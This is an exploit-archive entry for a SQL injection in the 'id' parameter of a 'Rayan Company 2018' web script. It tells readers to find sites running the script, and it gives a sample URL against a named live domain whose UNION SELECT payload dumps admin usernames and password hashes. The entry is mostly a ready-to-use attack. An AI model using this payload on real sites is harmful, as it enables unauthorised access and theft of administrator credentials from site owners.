# Exploit Title: Rayan Company 2018 - 'id' Blind SQL Injection
# Date: 2020-11-9
# Exploit Author: HnT403 (hnt403@gmail.com)
# Vendor Homepage: https://rayancompany.com
# Version : 1.0
# Tested on: Windows 10/Kali Linux
# CVE: N/A
# Description
The Vulnerability effects http://YOUR-TARGET.com/main.php .
Parameter: id
Access to admin username and password(hash)
#POC
step 1 - Find Your Target (Programmed using Rayan Company Script)
step 2 - add '/main/page.php?id=1' to target URL
step 3 - Inject Your Playload in 'id' parameter
#Sample Request
http://eapec2018.ir/main/en/page.php?id=-1%27+UNION+ALL+SELECT+1,2,3,group_concat(user,0x3a,pass,0x3c62723e29),5%20from%20rxd_admin%20--%20-